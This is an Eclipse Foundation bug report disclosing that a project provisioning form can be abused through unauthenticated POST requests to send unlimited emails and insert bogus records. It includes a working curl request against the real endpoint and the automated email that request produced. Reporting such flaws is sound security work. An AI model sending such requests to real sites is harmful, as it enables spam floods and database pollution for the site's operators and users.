Bug 532043

Description Christopher Guindon 2018-03-05 17:54:40 EST

This script can send an unlimited amount of emails to emo, webmaster and the inbox of an Eclipse user with a simple curl request:

curl -d "math=2&state=submit&yourName=CSRF@chrisguindon&committerName1=Chris&committerEmail1=chris.guindon%40eclipse-foundation.org" -X POST https://www.eclipse.org/projects/submit_project_provisioning_request.php

Also. we could alter this request to insert bogus records in our database.

I got this email after executing this curl request:

Eclipse WebMaster (Automated)
5:43 PM (2 minutes ago)
to emo-records, me 

Dear Chris,
If you do not already have a dev.eclipse.org unix account,
please do the following:

1. Create a Bugzilla account for yourself using your same
   email address: chris.guindon@eclipse-foundation.org
   If you do not use this same email address, your Bugzilla
   permissions will not be set correctly.

2. Follow the instructions in item 5 "Paperwork" of:
     http://www.eclipse.org/projects/dev_process/new-committer.php
   If you have not already done so, you need to fill out a web
   form questionnaire and possibly one or two paper agreements.
   Your committer account cannot be processed until these
   forms are received.

If you are currently an Eclipse committer, you need not do anything at
this time.  If further paperwork is required to cover these subsequent
rights, you will be contacted shortly.

                              Thank you.

-------------------------------------------------

New Committer Request

PMC Member: CSRF@chrisguindon
Email:

New Committer Info:
===================
initial project creation

Name: Chris
Project:
Email: chris.guindon@eclipse-foundation.org

Source Code Repository: